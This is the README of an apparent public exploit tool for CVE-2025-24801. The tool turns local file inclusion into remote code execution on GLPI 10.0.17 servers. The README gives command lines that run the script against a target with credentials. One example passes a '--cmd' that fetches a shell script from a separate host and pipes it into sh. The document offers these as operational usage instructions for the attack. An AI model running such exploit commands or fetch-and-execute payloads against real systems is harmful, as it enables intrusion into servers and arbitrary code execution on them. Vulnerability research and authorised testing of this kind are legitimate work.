
This exploit uses CVE-2025-24801 to get Remote Code Execution (RCE) via Local File Inclusion (LFI) at GLPI 10.0.17. Proof of Concept (PoC) of this CVE with explaination to this vulnerability in GLPI.
Some applications expose the /glpi/ endpoint (e.g., http://172.16.11.130:8080/glpi/front/computer.form.php). If the target application includes this endpoint, it is necessary to add it to the --url parameter (e.g., --url http://172.16.11.130:8080/glpi).
Example of usage.
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password
If you already executed this exploit and triggered RCE, you can use --cmd parameter to just execute the command.
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"